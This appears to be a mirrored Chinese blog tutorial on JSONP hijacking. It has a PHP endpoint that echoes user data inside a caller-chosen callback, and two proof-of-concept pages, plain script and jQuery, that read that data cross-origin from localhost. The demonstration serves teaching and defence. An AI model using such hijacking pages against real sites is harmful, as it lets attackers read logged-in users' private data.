zoukankan      html  css  js  c++  java
  • JSONP 劫持漏洞实例

    0x01 Jsonp简介

    Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。

    为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。

    同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。

    0x02 JSONP劫持漏洞实例

    getUser.php

    <?php
    header('Content-type: application/json');
    $jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名
    //json数据
    //$json_data = '["id","user"]';
    $json_data='({"id":"1","name":"Aaron"})';
    echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据
    ?>

    Payload利用:

    客户端实现 callbackFunction 函数

    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>JSONP劫持测试</title>
    </head>
    <body>
    <script type="text/javascript">
    function callbackFunction(result)
            {
                alert(result.name);
            }
    </script>
    <script type="text/javascript" src="http://127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script>
    </body>
    </html>

    jQuery 使用 JSONP

    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="utf-8">
        <title>JSONP劫持测试</title>
        <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>    
    </head>
    <body>
    <div id="divCustomers"></div>
    
    <script type="text/javascript">    
        $.getJSON("http://127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){
              alert(getUsers.name);
        });
    </script>
    </body>
    </html>

    最后

    欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

     

    参考资料:

    JSONP 简单教程 http://www.runoob.com/json/json-jsonp.html

  • 相关阅读:
    团队-科学计算器-成员简介及分工
    团队-团队编程项目作业名称-需求分析
    《对软件工程课程的期望》
    《自我介绍》
    个人编程项目
    对软件工程课程的期望
    《自我介绍》
    结队-爬取大麦网近期演唱会信息-项目进度
    团队-排课系统-设计文档
    团队-排课系统-开发环境搭建过程
  • 原文地址:https://www.cnblogs.com/xiaozi/p/9963523.html
Copyright © 2011-2022 走看看